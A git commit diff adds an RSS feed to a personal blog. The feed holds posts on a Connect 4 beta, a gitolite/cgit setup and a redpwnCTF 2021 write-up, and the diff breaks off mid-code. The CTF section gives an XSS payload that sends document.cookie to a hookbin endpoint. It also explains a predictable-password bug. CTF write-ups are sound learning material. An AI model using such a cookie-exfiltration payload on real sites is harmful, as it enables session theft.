add rss feed

6 files changed, 4447 insertions, 0 deletions

diff --git a/public/atom.xml b/public/atom.xml
new file mode 100644
index 0000000..9f9430b
--- /dev/null
+++ b/public/atom.xml
@@ -0,0 +1,4403 @@
+<?xml version="1.0" encoding="utf-8"?>
+<rss xmlns:atom="http://www.w3.org/2005/Atom" version="2.0">
+  <channel>
+    <title>Loek's excruciatingly interesting blog</title>
+    <description>This is where I post updates on things that I do</description>
+    <language>en-us</language>
+    <link>https://blog.pipeframe.xyz/atom.xml</link>
+    <atom:link href="https://blog.pipeframe.xyz/atom.xml" rel="self" type="application/rss+xml"/>
+    <item>
+      <title>Connect 4 beta live!</title>
+      <guid>connect4</guid>
+      <link>/post/connect4</link>
+      <pubDate>April 24 2021</pubDate>
+      <description>&lt;div class="contentWrapper"&gt;
+ &lt;p&gt;
+  My connect four website is currently online as a public beta. You can visit the
+website at
+  &lt;a href="https://connect4.pipeframe.xyz"&gt;
+   https://connect4.pipeframe.xyz
+  &lt;/a&gt;
+  . A list of known bugs is on the
+homepage, and all other issues should be submitted to
+  &lt;a href="https://github.com/lonkaars/connect-4/issues"&gt;
+   GitHub
+  &lt;/a&gt;
+  .
+ &lt;/p&gt;
+ &lt;p&gt;
+  If I encounter some very interesing bug that I think deserves it's own blog
+post I'll write one about it of course. I have one more week from now to worry
+about the connect four website, but after that I'm going to start preparing for
+my school exams.
+ &lt;/p&gt;
+&lt;/div&gt;</description>
+    </item>
+    <item>
+      <title>My git setup</title>
+      <guid>git</guid>
+      <link>/post/git</link>
+      <pubDate>April 28 2021</pubDate>
+      <description>&lt;div class="contentWrapper"&gt;
+ &lt;h2 id="overview"&gt;
+  Overview
+ &lt;/h2&gt;
+ &lt;p&gt;
+  I have two mechanisms set up for accessing my git server. I use gitolite for
+ssh access and permission management. I also have cgit set up which generates
+html pages for viewing your repositories and also hosts your repositories over
+http, or https if you have it set up.
+ &lt;/p&gt;
+ &lt;h2 id="ssh-access-with-gitolite"&gt;
+  SSH Access with gitolite
+ &lt;/h2&gt;
+ &lt;p&gt;
+  Gitolite was a pain in the ass to set up because I didn't understand umasks
+before I started trying to set it up. A
+  &lt;em&gt;
+   umask
+  &lt;/em&gt;
+  is like the opposite of what
+you'd enter when running
+  &lt;code&gt;
+   chmod
+  &lt;/code&gt;
+  . For example: if I run
+  &lt;code&gt;
+   touch test
+  &lt;/code&gt;
+  , I will
+now have a file with the same permissions as
+  &lt;code&gt;
+   chmod 644
+  &lt;/code&gt;
+  . That looks something
+like this:
+ &lt;/p&gt;
+ &lt;pre&gt;
+  &lt;div class="prismjs"&gt;
+   &lt;code class="language-sh" style="white-space:pre"&gt;
+    &lt;span class=""&gt;
+     $ touch test
+    &lt;/span&gt;
+    $ ls -l
+    &lt;!-- --&gt;
+    total bla bla
+    &lt;!-- --&gt;
+    -rw-r--r--  1 loek users 0 Apr 28 12:28 test
+    &lt;!-- --&gt;
+    $ chmod 644 test
+    &lt;!-- --&gt;
+    $ ls -l
+    &lt;!-- --&gt;
+    total bla bla
+    &lt;!-- --&gt;
+    -rw-r--r--  1 loek users 0 Apr 28 12:28 test
+    &lt;!-- --&gt;
+    $ # notice the same permissions on the 'test' file
+   &lt;/code&gt;
+  &lt;/div&gt;
+ &lt;/pre&gt;
+ &lt;p&gt;
+  If I want gitolite to create repositories with default permissions so other
+users can read the repositories, I have to set my umask to the opposite of 644.
+Here's a quick explanation of
+  &lt;code&gt;
+   ls -l
+  &lt;/code&gt;
+  's output:
+ &lt;/p&gt;
+ &lt;pre&gt;
+  &lt;div class="prismjs"&gt;
+   &lt;code class="language-sh" style="white-space:pre"&gt;
+    &lt;span class=""&gt;
+     -rw-r--r-- * user group size date time filename
+    &lt;/span&gt;
+    |└┬┘└┬┘└┬┘
+    &lt;!-- --&gt;
+    | |  |  └all users
+    &lt;!-- --&gt;
+    | |  └owner group
+    &lt;!-- --&gt;
+    | └owner user
+    &lt;!-- --&gt;
+    └type
+   &lt;/code&gt;
+  &lt;/div&gt;
+ &lt;/pre&gt;
+ &lt;p&gt;
+  Each digit in a
+  &lt;code&gt;
+   chmod
+  &lt;/code&gt;
+  command sets the permission for the file owner, file
+group, then everyone. That looks something like this:
+ &lt;/p&gt;
+ &lt;pre&gt;
+  &lt;div class="prismjs"&gt;
+   &lt;code class="language-sh" style="white-space:pre"&gt;
+    &lt;span class=""&gt;
+     $ chmod 644 test
+    &lt;/span&gt;
+    &lt;!-- --&gt;
+    decimal:  6   4   4
+    &lt;!-- --&gt;
+    binary:   110 100 100
+    &lt;!-- --&gt;
+    ls -l:  - rw- r-- r--
+   &lt;/code&gt;
+  &lt;/div&gt;
+ &lt;/pre&gt;
+ &lt;p&gt;
+  Then we take the opposite of this to get the umask:
+ &lt;/p&gt;
+ &lt;pre&gt;
+  &lt;div class="prismjs"&gt;
+   &lt;code class="language-sh" style="white-space:pre"&gt;
+    &lt;span class=""&gt;
+     $ chmod 755 directory -R
+    &lt;/span&gt;
+    &lt;!-- --&gt;
+    ls -l:  d rwx r-x r-x
+    &lt;!-- --&gt;
+    binary:   000 010 010
+    &lt;!-- --&gt;
+    decimal:  0   2   2
+   &lt;/code&gt;
+  &lt;/div&gt;
+ &lt;/pre&gt;
+ &lt;p&gt;
+  And now my
+  &lt;code&gt;
+   .gitolite.rc
+  &lt;/code&gt;
+  :
+ &lt;/p&gt;
+ &lt;pre&gt;
+  &lt;div class="prismjs"&gt;
+   &lt;code class="language-perl" style="white-space:pre"&gt;
+    &lt;span class="token variable"&gt;
+     %RC
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token operator"&gt;
+     =
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     UMASK
+    &lt;/span&gt;
+    &lt;span class="token operator"&gt;
+     =&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token number"&gt;
+     0022
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ,
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     ROLES
+    &lt;/span&gt;
+    &lt;span class="token operator"&gt;
+     =&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     {
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     READERS
+    &lt;/span&gt;
+    &lt;span class="token operator"&gt;
+     =&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token number"&gt;
+     1
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ,
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     WRITERS
+    &lt;/span&gt;
+    &lt;span class="token operator"&gt;
+     =&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token number"&gt;
+     1
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ,
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     }
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ,
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     ENABLE
+    &lt;/span&gt;
+    &lt;span class="token operator"&gt;
+     =&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     [
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token string"&gt;
+     'ssh-authkeys'
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ,
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token string"&gt;
+     'git-config'
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ,
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token string"&gt;
+     'daemon'
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ,
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token string"&gt;
+     'gitweb'
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ,
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ]
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ,
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token number"&gt;
+     1
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ;
+    &lt;/span&gt;
+   &lt;/code&gt;
+  &lt;/div&gt;
+ &lt;/pre&gt;
+ &lt;h2 id="https-access-with-cgit"&gt;
+  HTTP(S) Access with cgit
+ &lt;/h2&gt;
+ &lt;p&gt;
+  Cgit is probably the easiest thing to set up. It has great built-in
+documentation (
+  &lt;code&gt;
+   man 5 cgitrc
+  &lt;/code&gt;
+  ). Pretty much all configuration is in
+  &lt;code&gt;
+   /etc/cgitrc
+  &lt;/code&gt;
+  (css/syntax highlighting isn't in there). The only reason I'm
+posting my config here is because for some reason, the order of the options in
+cgit's config matters:
+ &lt;/p&gt;
+ &lt;pre&gt;
+  &lt;div class="prismjs"&gt;
+   &lt;code class="language-rc" style="white-space:pre"&gt;
+    &lt;span class=""&gt;
+     #
+    &lt;/span&gt;
+    # cgit config
+    &lt;!-- --&gt;
+    # see cgitrc(5) for details
+    &lt;!-- --&gt;
+    &lt;!-- --&gt;
+    cache-size=0
+    &lt;!-- --&gt;
+    enable-commit-graph=1
+    &lt;!-- --&gt;
+    &lt;!-- --&gt;
+    css=/cgit.css
+    &lt;!-- --&gt;
+    logo=/cgit.png
+    &lt;!-- --&gt;
+    &lt;!-- --&gt;
+    virtual-root=/
+    &lt;!-- --&gt;
+    remove-suffix=1
+    &lt;!-- --&gt;
+    &lt;!-- --&gt;
+    root-title=git :tada:
+    &lt;!-- --&gt;
+    &lt;!-- --&gt;
+    ##
+    &lt;!-- --&gt;
+    ## List of common mimetypes
+    &lt;!-- --&gt;
+    ##
+    &lt;!-- --&gt;
+    mimetype.gif=image/gif
+    &lt;!-- --&gt;
+    mimetype.html=text/html
+    &lt;!-- --&gt;
+    mimetype.jpg=image/jpeg
+    &lt;!-- --&gt;
+    mimetype.jpeg=image/jpeg
+    &lt;!-- --&gt;
+    mimetype.pdf=application/pdf
+    &lt;!-- --&gt;
+    mimetype.png=image/png
+    &lt;!-- --&gt;
+    mimetype.svg=image/svg+xml
+    &lt;!-- --&gt;
+    &lt;!-- --&gt;
+    # Highlight source code with python pygments-based highlighter
+    &lt;!-- --&gt;
+    source-filter=/usr/lib/cgit/filters/syntax-highlighting.py
+    &lt;!-- --&gt;
+    &lt;!-- --&gt;
+    # Format markdown, restructuredtext, manpages, text files, and html files
+    &lt;!-- --&gt;
+    # through the right converters
+    &lt;!-- --&gt;
+    about-filter=/usr/lib/cgit/filters/about-formatting.sh
+    &lt;!-- --&gt;
+    &lt;!-- --&gt;
+    ##
+    &lt;!-- --&gt;
+    ## Search for these files in the root of the default branch of repositories
+    &lt;!-- --&gt;
+    ## for coming up with the about page:
+    &lt;!-- --&gt;
+    ##
+    &lt;!-- --&gt;
+    readme=:README.md
+    &lt;!-- --&gt;
+    readme=:readme.md
+    &lt;!-- --&gt;
+    readme=:README.rst
+    &lt;!-- --&gt;
+    readme=:readme.rst
+    &lt;!-- --&gt;
+    readme=:README.txt
+    &lt;!-- --&gt;
+    readme=:readme.txt
+    &lt;!-- --&gt;
+    readme=:README
+    &lt;!-- --&gt;
+    readme=:readme
+    &lt;!-- --&gt;
+    readme=:INSTALL.md
+    &lt;!-- --&gt;
+    readme=:install.md
+    &lt;!-- --&gt;
+    readme=:INSTALL.mkd
+    &lt;!-- --&gt;
+    readme=:install.mkd
+    &lt;!-- --&gt;
+    readme=:INSTALL.rst
+    &lt;!-- --&gt;
+    readme=:install.rst
+    &lt;!-- --&gt;
+    readme=:INSTALL.html
+    &lt;!-- --&gt;
+    readme=:install.html
+    &lt;!-- --&gt;
+    readme=:INSTALL.htm
+    &lt;!-- --&gt;
+    readme=:install.htm
+    &lt;!-- --&gt;
+    readme=:INSTALL.txt
+    &lt;!-- --&gt;
+    readme=:install.txt
+    &lt;!-- --&gt;
+    readme=:INSTALL
+    &lt;!-- --&gt;
+    readme=:install
+    &lt;!-- --&gt;
+    &lt;!-- --&gt;
+    scan-path=/mnt/scf/git/repositories
+   &lt;/code&gt;
+  &lt;/div&gt;
+ &lt;/pre&gt;
+&lt;/div&gt;</description>
+    </item>
+    <item>
+      <title>Loek's excruciatingly interesting blog</title>
+      <guid>index</guid>
+      <link>/post/index</link>
+      <pubDate>April 12 2021</pubDate>
+      <description>&lt;div class="contentWrapper"&gt;
+ &lt;p&gt;
+  Welcome to my blog page! This is where I post updates on things that I do such
+as:
+ &lt;/p&gt;
+ &lt;ul&gt;
+  &lt;li&gt;
+   Cool open source software that I think you should use
+  &lt;/li&gt;
+  &lt;li&gt;
+   How to set up self-hosted applications
+  &lt;/li&gt;
+  &lt;li&gt;
+   Rants about Microsoft Windows
+  &lt;/li&gt;
+  &lt;li&gt;
+   Maybe some recipes I dunno
+  &lt;/li&gt;
+ &lt;/ul&gt;
+ &lt;p&gt;
+  The page you're looking at right now is also open-source! The code for this
+page can be found on
+  &lt;a href="https://github.com/lonkaars/blog"&gt;
+   GitHub
+  &lt;/a&gt;
+  , and should
+also be available on
+  &lt;a href="https://git.pipeframe.xyz"&gt;
+   my private git server
+  &lt;/a&gt;
+  .
+ &lt;/p&gt;
+&lt;/div&gt;</description>
+    </item>
+    <item>
+      <title>redpwnCTF 2021</title>
+      <guid>redpwn2021</guid>
+      <link>/post/redpwn2021</link>
+      <pubDate>July 13 2021</pubDate>
+      <description>&lt;div class="contentWrapper"&gt;
+ &lt;p&gt;
+  This is the first 'real' CTF I've participated in. About two weeks ago, a
+friend of mine was stuck on some challenges from the Radboud CTF. This was a
+closed CTF more geared towards beginners (high school students), and only had a
+few challenges which required deeper technical knowledge of web servers and
+programming. Willem solved most of the challenges, and I helped solve 3 more.
+ &lt;/p&gt;
+ &lt;p&gt;
+  Apart from those challenges, basically all my hacking knowledge comes from
+computerphile videos, liveoverflow videos and making applications myself.
+ &lt;/p&gt;
+ &lt;h2 id="challenges"&gt;
+  Challenges
+ &lt;/h2&gt;
+ &lt;h3 id="webpastebin-1"&gt;
+  web/pastebin-1
+ &lt;/h3&gt;
+ &lt;p&gt;
+  This challenge is a simple XSS exploit. The website that's vulnerable is
+supposed to be a clone of pastebin. I can enter any text into the paste area,
+and it will get inserted as HTML code into the website when someone visits the
+generated link.
+ &lt;/p&gt;
+ &lt;p&gt;
+  The challenge has two sites: one with the pastebin clone, and one that visits
+any pastebin url as the website administrator. The goal of this challenge is
+given by it's description:
+ &lt;/p&gt;
+ &lt;blockquote&gt;
+  &lt;p&gt;
+   Ah, the classic pastebin. Can you get the admin's cookies?
+  &lt;/p&gt;
+ &lt;/blockquote&gt;
+ &lt;p&gt;
+  In JS, you can read all cookies without the
+  &lt;code&gt;
+   HttpOnly
+  &lt;/code&gt;
+  attribute by reading
+  &lt;code&gt;
+   document.cookie
+  &lt;/code&gt;
+  . This allows us to read the cookies from the admin's browser,
+but now we have to figure out a way to get them sent back to us.
+ &lt;/p&gt;
+ &lt;p&gt;
+  Luckily, there's a free service called
+  &lt;a href="https://hookbin.com/"&gt;
+   hookbin
+  &lt;/a&gt;
+  that
+gives you an http endpoint to send anything to, and look at the request
+details.
+ &lt;/p&gt;
+ &lt;p&gt;
+  Combining these two a simple paste can be created:
+ &lt;/p&gt;
+ &lt;pre&gt;
+  &lt;div class="prismjs"&gt;
+   &lt;code class="language-html" style="white-space:pre"&gt;
+    &lt;span class="token tag punctuation"&gt;
+     &lt;
+    &lt;/span&gt;
+    &lt;span class="token tag"&gt;
+     script
+    &lt;/span&gt;
+    &lt;span class="token tag punctuation"&gt;
+     &gt;
+    &lt;/span&gt;
+    &lt;span class="token script language-javascript"&gt;
+    &lt;/span&gt;
+    &lt;span class="token script language-javascript"&gt;
+    &lt;/span&gt;
+    &lt;span class="token script language-javascript keyword"&gt;
+     var
+    &lt;/span&gt;
+    &lt;span class="token script language-javascript"&gt;
+     post
+    &lt;/span&gt;
+    &lt;span class="token script language-javascript operator"&gt;
+     =
+    &lt;/span&gt;
+    &lt;span class="token script language-javascript"&gt;
+    &lt;/span&gt;
+    &lt;span class="token script language-javascript keyword"&gt;
+     new
+    &lt;/span&gt;
+    &lt;span class="token script language-javascript"&gt;
+    &lt;/span&gt;
+    &lt;span class="token script language-javascript class-name"&gt;
+     XMLHttpRequest
+    &lt;/span&gt;
+    &lt;span class="token script language-javascript punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class="token script language-javascript punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class="token script language-javascript punctuation"&gt;
+     ;
+    &lt;/span&gt;
+    &lt;span class="token script language-javascript"&gt;
+    &lt;/span&gt;
+    &lt;span class="token script language-javascript"&gt;
+     post
+    &lt;/span&gt;
+    &lt;span class="token script language-javascript punctuation"&gt;
+     .
+    &lt;/span&gt;
+    &lt;span class="token script language-javascript method function property-access"&gt;
+     open
+    &lt;/span&gt;
+    &lt;span class="token script language-javascript punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class="token script language-javascript string"&gt;
+     "post"
+    &lt;/span&gt;
+    &lt;span class="token script language-javascript punctuation"&gt;
+     ,
+    &lt;/span&gt;
+    &lt;span class="token script language-javascript"&gt;
+    &lt;/span&gt;
+    &lt;span class="token script language-javascript string"&gt;
+     "https://hookb.in/&lt;endpoint url&gt;"
+    &lt;/span&gt;
+    &lt;span class="token script language-javascript punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class="token script language-javascript punctuation"&gt;
+     ;
+    &lt;/span&gt;
+    &lt;span class="token script language-javascript"&gt;
+    &lt;/span&gt;
+    &lt;span class="token script language-javascript"&gt;
+     post
+    &lt;/span&gt;
+    &lt;span class="token script language-javascript punctuation"&gt;
+     .
+    &lt;/span&gt;
+    &lt;span class="token script language-javascript method function property-access"&gt;
+     send
+    &lt;/span&gt;
+    &lt;span class="token script language-javascript punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class="token script language-javascript dom variable"&gt;
+     document
+    &lt;/span&gt;
+    &lt;span class="token script language-javascript punctuation"&gt;
+     .
+    &lt;/span&gt;
+    &lt;span class="token script language-javascript property-access"&gt;
+     cookie
+    &lt;/span&gt;
+    &lt;span class="token script language-javascript punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class="token script language-javascript punctuation"&gt;
+     ;
+    &lt;/span&gt;
+    &lt;span class="token script language-javascript"&gt;
+    &lt;/span&gt;
+    &lt;span class="token script language-javascript"&gt;
+    &lt;/span&gt;
+    &lt;span class="token tag punctuation"&gt;
+     &lt;/
+    &lt;/span&gt;
+    &lt;span class="token tag"&gt;
+     script
+    &lt;/span&gt;
+    &lt;span class="token tag punctuation"&gt;
+     &gt;
+    &lt;/span&gt;
+   &lt;/code&gt;
+  &lt;/div&gt;
+ &lt;/pre&gt;
+ &lt;h3 id="cryptoscissor"&gt;
+  crypto/scissor
+ &lt;/h3&gt;
+ &lt;p&gt;
+  I wasn't planning on including this one, but it makes use of the excellent
+  &lt;a href="https://gchq.github.io/CyberChef/"&gt;
+   CyberChef
+  &lt;/a&gt;
+  tool. The flag is given in the
+challenge description, and is encrypted using a ceasar/rot13 cipher. A simple
+python implementation of this cypher is included with the challenge, but I just
+put it into CyberChef and started trying different offsets.
+ &lt;/p&gt;
+ &lt;h3 id="revwstrings"&gt;
+  rev/wstrings
+ &lt;/h3&gt;
+ &lt;blockquote&gt;
+  &lt;p&gt;
+   Some strings are wider than normal...
+  &lt;/p&gt;
+ &lt;/blockquote&gt;
+ &lt;p&gt;
+  This challenge has a binary that uses a simple
+  &lt;code&gt;
+   strcmp
+  &lt;/code&gt;
+  to check the flag. When
+running the program, the following output is visible:
+ &lt;/p&gt;
+ &lt;pre&gt;
+  &lt;div class="prismjs"&gt;
+   &lt;code class="language-sh" style="white-space:pre"&gt;
+    &lt;span class=""&gt;
+     # ./wstrings
+    &lt;/span&gt;
+    Welcome to flag checker 1.0.
+    &lt;!-- --&gt;
+    Give me a flag&gt;
+   &lt;/code&gt;
+  &lt;/div&gt;
+ &lt;/pre&gt;
+ &lt;p&gt;
+  My first stategy was running the
+  &lt;code&gt;
+   strings
+  &lt;/code&gt;
+  utility on the
+  &lt;code&gt;
+   wstrings
+  &lt;/code&gt;
+  binary,
+but I didn't find the flag. What was interesting to me though was that I also
+couldn't find the prompt text... This immediately made me check for other
+string encodings.
+ &lt;/p&gt;
+ &lt;p&gt;
+  Running the
+  &lt;code&gt;
+   strings
+  &lt;/code&gt;
+  utility with the
+  &lt;code&gt;
+   -eL
+  &lt;/code&gt;
+  flag tells
+  &lt;code&gt;
+   strings
+  &lt;/code&gt;
+  to look for
+32-bit little-endian encoded strings, and lo and behold the flag shows up!
+ &lt;/p&gt;
+ &lt;p&gt;
+  This is because ascii strings are less 'wide' than 32-bit strings:
+ &lt;/p&gt;
+ &lt;pre&gt;
+  &lt;code&gt;
+   --- ascii ---
+
+hex -&gt; 0x68 0x65 0x6c 0x6c 0x6f
+str -&gt; h    e    l    l    o
+  &lt;/code&gt;
+ &lt;/pre&gt;
+ &lt;p&gt;
+  Notice how each character is represented by a single byte each (8 bits) in
+ascii, as opposed to 32-bit characters in 32-bit land.
+ &lt;/p&gt;
+ &lt;pre&gt;
+  &lt;code&gt;
+   --- 32-bit land ---
+
+hex -&gt; 0x00000068 0x00000065 0x0000006c 0x0000006c 0x0000006f
+str -&gt; h          e          l          l          o
+  &lt;/code&gt;
+ &lt;/pre&gt;
+ &lt;p&gt;
+  I think 32-bit strings also have practical use for things like non-english
+texts such as hebrew, chinese or japanese. Those characters take up more space
+anyways, and you would waste less space by not using unicode escape characters.
+ &lt;/p&gt;
+ &lt;h3 id="websecure"&gt;
+  web/secure
+ &lt;/h3&gt;
+ &lt;blockquote&gt;
+  &lt;p&gt;
+   Just learned about encryption—now, my website is unhackable!
+  &lt;/p&gt;
+ &lt;/blockquote&gt;
+ &lt;p&gt;
+  This challenge is pretty simple if you know some of JS's quirks. Right at the
+top of the file is an sqlite3 expression in JS:
+ &lt;/p&gt;
+ &lt;pre&gt;
+  &lt;div class="prismjs"&gt;
+   &lt;code class="language-js" style="white-space:pre"&gt;
+    &lt;span class="token comment"&gt;
+     ////////
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     db
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     .
+    &lt;/span&gt;
+    &lt;span class="token method function property-access"&gt;
+     exec
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class="token template-string template-punctuation string"&gt;
+     `
+    &lt;/span&gt;
+    &lt;span class="token template-string string"&gt;
+     INSERT INTO users (username, password) VALUES (
+    &lt;/span&gt;
+    &lt;span class="token template-string string"&gt;
+     '
+    &lt;/span&gt;
+    &lt;span class="token template-string interpolation interpolation-punctuation punctuation"&gt;
+     ${
+    &lt;/span&gt;
+    &lt;span class="token template-string interpolation function"&gt;
+     btoa
+    &lt;/span&gt;
+    &lt;span class="token template-string interpolation punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class="token template-string interpolation string"&gt;
+     'admin'
+    &lt;/span&gt;
+    &lt;span class="token template-string interpolation punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class="token template-string interpolation interpolation-punctuation punctuation"&gt;
+     }
+    &lt;/span&gt;
+    &lt;span class="token template-string string"&gt;
+     ',
+    &lt;/span&gt;
+    &lt;span class="token template-string string"&gt;
+     '
+    &lt;/span&gt;
+    &lt;span class="token template-string interpolation interpolation-punctuation punctuation"&gt;
+     ${
+    &lt;/span&gt;
+    &lt;span class="token template-string interpolation function"&gt;
+     btoa
+    &lt;/span&gt;
+    &lt;span class="token template-string interpolation punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class="token template-string interpolation"&gt;
+     crypto
+    &lt;/span&gt;
+    &lt;span class="token template-string interpolation punctuation"&gt;
+     .
+    &lt;/span&gt;
+    &lt;span class="token template-string interpolation property-access"&gt;
+     randomUUID
+    &lt;/span&gt;
+    &lt;span class="token template-string interpolation punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class="token template-string interpolation interpolation-punctuation punctuation"&gt;
+     }
+    &lt;/span&gt;
+    &lt;span class="token template-string string"&gt;
+     '
+    &lt;/span&gt;
+    &lt;span class="token template-string string"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class="token template-string template-punctuation string"&gt;
+     `
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ;
+    &lt;/span&gt;
+   &lt;/code&gt;
+  &lt;/div&gt;
+ &lt;/pre&gt;
+ &lt;p&gt;
+  This section of code immediately jumped out to me because I noticed that
+  &lt;code&gt;
+   crypto.randomUUID
+  &lt;/code&gt;
+  wansn't actually being called.
+ &lt;/p&gt;
+ &lt;p&gt;
+  Because the 'random uuid' is being fed into
+  &lt;code&gt;
+   btoa()
+  &lt;/code&gt;
+  it becomes a base64
+encoded string. However,
+  &lt;code&gt;
+   btoa()
+  &lt;/code&gt;
+  also expects a string as input. Because every
+object in JS has a
+  &lt;code&gt;
+   .toString()
+  &lt;/code&gt;
+  method, when you pass it into a function
+expecting another type, JS will happily convert it for you without warning.
+ &lt;/p&gt;
+ &lt;p&gt;
+  This means that the admin's password will always be a base64-encoded version of
+  &lt;code&gt;
+   crypto.randomUUID
+  &lt;/code&gt;
+  's source code. We can get that base64-encoded source code
+by running the following in a NodeJS REPL:
+ &lt;/p&gt;
+ &lt;pre&gt;
+  &lt;div class="prismjs"&gt;
+   &lt;code class="language-js" style="white-space:pre"&gt;
+    &lt;span class="token comment"&gt;
+     // import file system and crypto modules
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token keyword"&gt;
+     var
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     writeFileSync
+    &lt;/span&gt;
+    &lt;span class="token operator"&gt;
+     =
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token function"&gt;
+     require
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class="token string"&gt;
+     'fs'
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     .
+    &lt;/span&gt;
+    &lt;span class="token property-access"&gt;
+     writeFileSync
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token keyword"&gt;
+     var
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     crypto
+    &lt;/span&gt;
+    &lt;span class="token operator"&gt;
+     =
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token function"&gt;
+     require
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class="token string"&gt;
+     'crypto'
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token comment"&gt;
+     // write source to file
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token function"&gt;
+     writeFileSync
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class="token string"&gt;
+     './randomUUID.js'
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ,
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token function"&gt;
+     btoa
